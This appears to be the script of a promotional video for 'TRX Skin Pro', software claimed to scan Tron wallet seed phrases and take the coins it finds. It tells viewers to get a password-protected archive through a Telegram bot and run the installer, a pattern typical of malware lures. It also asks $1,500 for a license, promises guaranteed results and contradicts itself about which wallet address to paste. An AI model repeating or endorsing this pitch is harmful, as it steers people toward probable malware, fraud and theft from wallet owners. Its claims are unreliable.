Hey everyone, today, I'm excited to introduce you to a game-changing software called TRX Skin Pro. This isn't just another program, it's your ultimate tool for automated TRX and USDT mining. Using cutting-edge technology, TRX Skin Pro analyzes Tron wallet seed phrases and instantly transfers all discovered coins to your wallet. It's the perfect solution for anyone looking to take their cryptocurrency game to the next level. Want to test the program for free for 1 day? Simply follow the link to the official Telegram bot. You'll find the link in the description of this video or in the comments. Once there, just follow these easy steps. Download the TRX Skin Pro archive and pack it inside. You'll find a text file with a password and the installer. Run the installer, enter the password from the file, and the program will activate. The TRX Skin program is very easy to use. All you need to do is select the mining power and paste your Ethereum wallet address. The program will handle the rest. TRX Skin Pro is incredibly easy to use. Just select the mining power, paste your Tron wallet address, and let the program do the rest. No complications, just results. If you want full access to the program, you can purchase a lifetime license for just $1,500. This includes lifetime support and regular updates. But beware, watch out for scammers and fake copies. Our software is a unique product that delivers 100% results. Don't miss your chance to be part of the crypto revolution. Click the link in the description or comments and test TRX Skin Pro today. Your Tron wallet will thank you.